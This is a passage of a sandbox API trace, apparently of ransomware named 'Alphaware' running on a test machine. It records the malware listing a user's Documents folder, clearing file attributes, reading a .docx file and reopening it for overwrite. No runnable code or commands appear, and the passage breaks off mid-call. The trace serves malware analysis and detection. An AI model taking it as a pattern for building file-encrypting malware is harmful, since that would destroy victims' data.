ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 1 [0081.956] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54550780, ftCreationTime.dwHighDateTime=0x1d969c6, ftLastAccessTime.dwLowDateTime=0x22860c70, ftLastAccessTime.dwHighDateTime=0x1d973dc, ftLastWriteTime.dwLowDateTime=0x82d7f9e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10c88, dwReserved0=0x0, dwReserved1=0x0, cFileName="_7pBY2-omnUcu.gif.Alphaware", cAlternateFileName="_7PBY2~1.ALP")) returned 0 [0081.956] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0081.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0081.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcbad9620, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcbad9620, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac959be0, ftCreationTime.dwHighDateTime=0x1d91ba5, ftLastAccessTime.dwLowDateTime=0xcaa74f80, ftLastAccessTime.dwHighDateTime=0x1d95b64, ftLastWriteTime.dwLowDateTime=0xcaa74f80, ftLastWriteTime.dwHighDateTime=0x1d95b64, nFileSizeHigh=0x0, nFileSizeLow=0x9834, dwReserved0=0x0, dwReserved1=0x0, cFileName="-mBHtuQ4.docx", cAlternateFileName="-MBHTU~1.DOC")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77a3b930, ftCreationTime.dwHighDateTime=0x1d96bc8, ftLastAccessTime.dwLowDateTime=0xea143ce0, ftLastAccessTime.dwHighDateTime=0x1d96eae, ftLastWriteTime.dwLowDateTime=0xea143ce0, ftLastWriteTime.dwHighDateTime=0x1d96eae, nFileSizeHigh=0x0, nFileSizeLow=0x4787, dwReserved0=0x0, dwReserved1=0x0, cFileName="1dc7CK 8O2M4jV0-v99j.doc", cAlternateFileName="1DC7CK~1.DOC")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde85d950, ftCreationTime.dwHighDateTime=0x1d9653b, ftLastAccessTime.dwLowDateTime=0x9314d360, ftLastAccessTime.dwHighDateTime=0x1d96da4, ftLastWriteTime.dwLowDateTime=0x9314d360, ftLastWriteTime.dwHighDateTime=0x1d96da4, nFileSizeHigh=0x0, nFileSizeLow=0xa845, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ahm.xlsx", cAlternateFileName="2AHM~1.XLS")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63bc3f80, ftCreationTime.dwHighDateTime=0x1d96ad5, ftLastAccessTime.dwLowDateTime=0xc3b83e00, ftLastAccessTime.dwHighDateTime=0x1d96d16, ftLastWriteTime.dwLowDateTime=0xc3b83e00, ftLastWriteTime.dwHighDateTime=0x1d96d16, nFileSizeHigh=0x0, nFileSizeLow=0x17f49, dwReserved0=0x0, dwReserved1=0x0, cFileName="4A87C_8NPb.pps", cAlternateFileName="4A87C_~1.PPS")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1bd690, ftCreationTime.dwHighDateTime=0x1d8edc7, ftLastAccessTime.dwLowDateTime=0xd4054800, ftLastAccessTime.dwHighDateTime=0x1d8f559, ftLastWriteTime.dwLowDateTime=0xd4054800, ftLastWriteTime.dwHighDateTime=0x1d8f559, nFileSizeHigh=0x0, nFileSizeLow=0xff7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ac gZ.docx", cAlternateFileName="ACGZ~1.DOC")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd35bd9c0, ftCreationTime.dwHighDateTime=0x1d96c17, ftLastAccessTime.dwLowDateTime=0xa07fed10, ftLastAccessTime.dwHighDateTime=0x1d975e1, ftLastWriteTime.dwLowDateTime=0xa07fed10, ftLastWriteTime.dwHighDateTime=0x1d975e1, nFileSizeHigh=0x0, nFileSizeLow=0x17271, dwReserved0=0x0, dwReserved1=0x0, cFileName="CH482b9Cr-K.ots", cAlternateFileName="CH482B~1.OTS")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a0c280, ftCreationTime.dwHighDateTime=0x1d93459, ftLastAccessTime.dwLowDateTime=0x62984420, ftLastAccessTime.dwHighDateTime=0x1d9621d, ftLastWriteTime.dwLowDateTime=0x62984420, ftLastWriteTime.dwHighDateTime=0x1d9621d, nFileSizeHigh=0x0, nFileSizeLow=0xf0f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Daw-ipdR7oVXj2G.docx", cAlternateFileName="DAW-IP~1.DOC")) returned 1 [0081.957] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5d0bb50, ftCreationTime.dwHighDateTime=0x1d974f9, ftLastAccessTime.dwLowDateTime=0x47ebbca0, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0x47ebbca0, ftLastWriteTime.dwHighDateTime=0x1d975f1, nFileSizeHigh=0x0, nFileSizeLow=0x178ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="DITJBeUAzHRJy.ots", cAlternateFileName="DITJBE~1.OTS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b92770, ftCreationTime.dwHighDateTime=0x1d9437d, ftLastAccessTime.dwLowDateTime=0xf4886af0, ftLastAccessTime.dwHighDateTime=0x1d975bd, ftLastWriteTime.dwLowDateTime=0xf4886af0, ftLastWriteTime.dwHighDateTime=0x1d975bd, nFileSizeHigh=0x0, nFileSizeLow=0xfd74, dwReserved0=0x0, dwReserved1=0x0, cFileName="dNMC XdC2fS1.pptx", cAlternateFileName="DNMCXD~1.PPT")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a94d90, ftCreationTime.dwHighDateTime=0x1d967f1, ftLastAccessTime.dwLowDateTime=0xc7558580, ftLastAccessTime.dwHighDateTime=0x1d96993, ftLastWriteTime.dwLowDateTime=0xc7558580, ftLastWriteTime.dwHighDateTime=0x1d96993, nFileSizeHigh=0x0, nFileSizeLow=0xaf69, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZ5O.docx", cAlternateFileName="DZ5O~1.DOC")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e51dc40, ftCreationTime.dwHighDateTime=0x1d969f0, ftLastAccessTime.dwLowDateTime=0x15d1dce0, ftLastAccessTime.dwHighDateTime=0x1d97385, ftLastWriteTime.dwLowDateTime=0x15d1dce0, ftLastWriteTime.dwHighDateTime=0x1d97385, nFileSizeHigh=0x0, nFileSizeLow=0x78db, dwReserved0=0x0, dwReserved1=0x0, cFileName="D_cm4s7fP.pptx", cAlternateFileName="D_CM4S~1.PPT")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x503ed6f0, ftCreationTime.dwHighDateTime=0x1d943fe, ftLastAccessTime.dwLowDateTime=0x64756d00, ftLastAccessTime.dwHighDateTime=0x1d9701d, ftLastWriteTime.dwLowDateTime=0x64756d00, ftLastWriteTime.dwHighDateTime=0x1d9701d, nFileSizeHigh=0x0, nFileSizeLow=0xdc4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="gerLGhJ-J1Fq.xlsx", cAlternateFileName="GERLGH~1.XLS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b600, ftCreationTime.dwHighDateTime=0x1d97469, ftLastAccessTime.dwLowDateTime=0x8884feb0, ftLastAccessTime.dwHighDateTime=0x1d97485, ftLastWriteTime.dwLowDateTime=0x8884feb0, ftLastWriteTime.dwHighDateTime=0x1d97485, nFileSizeHigh=0x0, nFileSizeLow=0x6a24, dwReserved0=0x0, dwReserved1=0x0, cFileName="GwoFAC.pdf", cAlternateFileName="")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d85d70, ftCreationTime.dwHighDateTime=0x1d96dec, ftLastAccessTime.dwLowDateTime=0x9c877e90, ftLastAccessTime.dwHighDateTime=0x1d96ee2, ftLastWriteTime.dwLowDateTime=0x9c877e90, ftLastWriteTime.dwHighDateTime=0x1d96ee2, nFileSizeHigh=0x0, nFileSizeLow=0x3ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="hoG8.xlsx", cAlternateFileName="HOG8~1.XLS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec285530, ftCreationTime.dwHighDateTime=0x1d916dd, ftLastAccessTime.dwLowDateTime=0x3c2aff40, ftLastAccessTime.dwHighDateTime=0x1d9405c, ftLastWriteTime.dwLowDateTime=0x3c2aff40, ftLastWriteTime.dwHighDateTime=0x1d9405c, nFileSizeHigh=0x0, nFileSizeLow=0xe176, dwReserved0=0x0, dwReserved1=0x0, cFileName="hTjop.xlsx", cAlternateFileName="HTJOP~1.XLS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0e03c0, ftCreationTime.dwHighDateTime=0x1d95d6e, ftLastAccessTime.dwLowDateTime=0x32233aa0, ftLastAccessTime.dwHighDateTime=0x1d95ec8, ftLastWriteTime.dwLowDateTime=0x32233aa0, ftLastWriteTime.dwHighDateTime=0x1d95ec8, nFileSizeHigh=0x0, nFileSizeLow=0xc665, dwReserved0=0x0, dwReserved1=0x0, cFileName="i5YIwk0.pptx", cAlternateFileName="I5YIWK~1.PPT")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d178af0, ftCreationTime.dwHighDateTime=0x1d96de9, ftLastAccessTime.dwLowDateTime=0xe846b4c0, ftLastAccessTime.dwHighDateTime=0x1d9715f, ftLastWriteTime.dwLowDateTime=0xe846b4c0, ftLastWriteTime.dwHighDateTime=0x1d9715f, nFileSizeHigh=0x0, nFileSizeLow=0xa84d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J8xwAYmu3o.xls", cAlternateFileName="J8XWAY~1.XLS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6dfc50, ftCreationTime.dwHighDateTime=0x1d970b9, ftLastAccessTime.dwLowDateTime=0x895d6900, ftLastAccessTime.dwHighDateTime=0x1d97564, ftLastWriteTime.dwLowDateTime=0x895d6900, ftLastWriteTime.dwHighDateTime=0x1d97564, nFileSizeHigh=0x0, nFileSizeLow=0x30f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MKqMrJd2GayW Iyftd.ots", cAlternateFileName="MKQMRJ~1.OTS")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0081.958] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe63a6c10, ftCreationTime.dwHighDateTime=0x1d97567, ftLastAccessTime.dwLowDateTime=0x767660b0, ftLastAccessTime.dwHighDateTime=0x1d97624, ftLastWriteTime.dwLowDateTime=0x767660b0, ftLastWriteTime.dwHighDateTime=0x1d97624, nFileSizeHigh=0x0, nFileSizeLow=0xd30a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="No5ewLi.ppt", cAlternateFileName="")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc580, ftCreationTime.dwHighDateTime=0x1d960cd, ftLastAccessTime.dwLowDateTime=0xe96d0280, ftLastAccessTime.dwHighDateTime=0x1d96d10, ftLastWriteTime.dwLowDateTime=0xe96d0280, ftLastWriteTime.dwHighDateTime=0x1d96d10, nFileSizeHigh=0x0, nFileSizeLow=0x2931, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4VMeO_PmK30fk6.xlsx", cAlternateFileName="O4VMEO~1.XLS")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd77e2530, ftCreationTime.dwHighDateTime=0x1d96b04, ftLastAccessTime.dwLowDateTime=0xb70f9980, ftLastAccessTime.dwHighDateTime=0x1d970d8, ftLastWriteTime.dwLowDateTime=0xb70f9980, ftLastWriteTime.dwHighDateTime=0x1d970d8, nFileSizeHigh=0x0, nFileSizeLow=0x16a12, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozdQhhdYCAhwn.odp", cAlternateFileName="OZDQHH~1.ODP")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec3e0, ftCreationTime.dwHighDateTime=0x1d91354, ftLastAccessTime.dwLowDateTime=0xc01a6a90, ftLastAccessTime.dwHighDateTime=0x1d969a4, ftLastWriteTime.dwLowDateTime=0xc01a6a90, ftLastWriteTime.dwHighDateTime=0x1d969a4, nFileSizeHigh=0x0, nFileSizeLow=0x17614, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPCDrQ5.docx", cAlternateFileName="PPCDRQ~1.DOC")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5589620, ftCreationTime.dwHighDateTime=0x1d97354, ftLastAccessTime.dwLowDateTime=0x78654fb0, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x78654fb0, ftLastWriteTime.dwHighDateTime=0x1d97635, nFileSizeHigh=0x0, nFileSizeLow=0x15276, dwReserved0=0x0, dwReserved1=0x0, cFileName="qQ69AqvCd-_gGmFEhfCj.pdf", cAlternateFileName="QQ69AQ~1.PDF")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4ae3c0, ftCreationTime.dwHighDateTime=0x1d93fbd, ftLastAccessTime.dwLowDateTime=0xdea6e0c0, ftLastAccessTime.dwHighDateTime=0x1d96539, ftLastWriteTime.dwLowDateTime=0xdea6e0c0, ftLastWriteTime.dwHighDateTime=0x1d96539, nFileSizeHigh=0x0, nFileSizeLow=0x15d1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="RkF0hT0Xfp-m3q.pptx", cAlternateFileName="RKF0HT~1.PPT")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7010b930, ftCreationTime.dwHighDateTime=0x1d973fb, ftLastAccessTime.dwLowDateTime=0xba2055c0, ftLastAccessTime.dwHighDateTime=0x1d975d7, ftLastWriteTime.dwLowDateTime=0xba2055c0, ftLastWriteTime.dwHighDateTime=0x1d975d7, nFileSizeHigh=0x0, nFileSizeLow=0x6553, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLI9xvryK mch.ots", cAlternateFileName="SLI9XV~1.OTS")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b8a7fd0, ftCreationTime.dwHighDateTime=0x1d8f5a0, ftLastAccessTime.dwLowDateTime=0x89facc90, ftLastAccessTime.dwHighDateTime=0x1d94e77, ftLastWriteTime.dwLowDateTime=0x89facc90, ftLastWriteTime.dwHighDateTime=0x1d94e77, nFileSizeHigh=0x0, nFileSizeLow=0x3909, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6t2jBTAet1hJh.pptx", cAlternateFileName="U6T2JB~1.PPT")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97851bb0, ftCreationTime.dwHighDateTime=0x1d95c12, ftLastAccessTime.dwLowDateTime=0x36d38630, ftLastAccessTime.dwHighDateTime=0x1d96400, ftLastWriteTime.dwLowDateTime=0x36d38630, ftLastWriteTime.dwHighDateTime=0x1d96400, nFileSizeHigh=0x0, nFileSizeLow=0x9d5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="UgJB0bK8M6Fbzeqf.xlsx", cAlternateFileName="UGJB0B~1.XLS")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77ec2190, ftCreationTime.dwHighDateTime=0x1d8f3df, ftLastAccessTime.dwLowDateTime=0x30b22920, ftLastAccessTime.dwHighDateTime=0x1d90f21, ftLastWriteTime.dwLowDateTime=0x30b22920, ftLastWriteTime.dwHighDateTime=0x1d90f21, nFileSizeHigh=0x0, nFileSizeLow=0x17c8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wO--2PwPxtF.pptx", cAlternateFileName="WO--2P~1.PPT")) returned 1 [0081.959] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x291b14e0, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdfce5f80, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xdfce5f80, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y- 0", cAlternateFileName="Y-0~1")) returned 1 [0081.960] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa0a610, ftCreationTime.dwHighDateTime=0x1d96d2e, ftLastAccessTime.dwLowDateTime=0x40b60b60, ftLastAccessTime.dwHighDateTime=0x1d973fe, ftLastWriteTime.dwLowDateTime=0x40b60b60, ftLastWriteTime.dwHighDateTime=0x1d973fe, nFileSizeHigh=0x0, nFileSizeLow=0x10145, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZiOJla1 Q-SXSl2W5.xlsx", cAlternateFileName="ZIOJLA~1.XLS")) returned 1 [0081.960] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb78090, ftCreationTime.dwHighDateTime=0x1d96683, ftLastAccessTime.dwLowDateTime=0xbe0a3d60, ftLastAccessTime.dwHighDateTime=0x1d968e2, ftLastWriteTime.dwLowDateTime=0xbe0a3d60, ftLastWriteTime.dwHighDateTime=0x1d968e2, nFileSizeHigh=0x0, nFileSizeLow=0xd298, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.docx", cAlternateFileName="_AOXUB~1.DOC")) returned 1 [0081.960] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0081.960] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.960] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx", dwFileAttributes=0x80) returned 1 [0081.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.960] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx"), fInfoLevelId=0x0, lpFileInformation=0x25a0ae0 | out: lpFileInformation=0x25a0ae0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xac959be0, ftCreationTime.dwHighDateTime=0x1d91ba5, ftLastAccessTime.dwLowDateTime=0xcaa74f80, ftLastAccessTime.dwHighDateTime=0x1d95b64, ftLastWriteTime.dwLowDateTime=0xcaa74f80, ftLastWriteTime.dwHighDateTime=0x1d95b64, nFileSizeHigh=0x0, nFileSizeLow=0x9834)) returned 1 [0081.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.961] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.961] GetFileType (hFile=0x254) returned 0x1 [0081.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.961] GetFileType (hFile=0x254) returned 0x1 [0081.961] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x9834 [0081.962] ReadFile (in: hFile=0x254, lpBuffer=0x25a0d18, nNumberOfBytesToRead=0x9834, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25a0d18*, lpNumberOfBytesRead=0x23eb38*=0x9834, lpOverlapped=0x0) returned 1 [0081.963] CloseHandle (hObject=0x254) returned 1 [0082.014] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.014] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-mBHtuQ4.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\-mbhtuq4.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.016] GetFileType (hFile=0x254) returned 0x1 [0082.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.016] GetFileType (hFile=0x254) returned 0x1 [0082.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.018] GetFileAttributesExW (in: 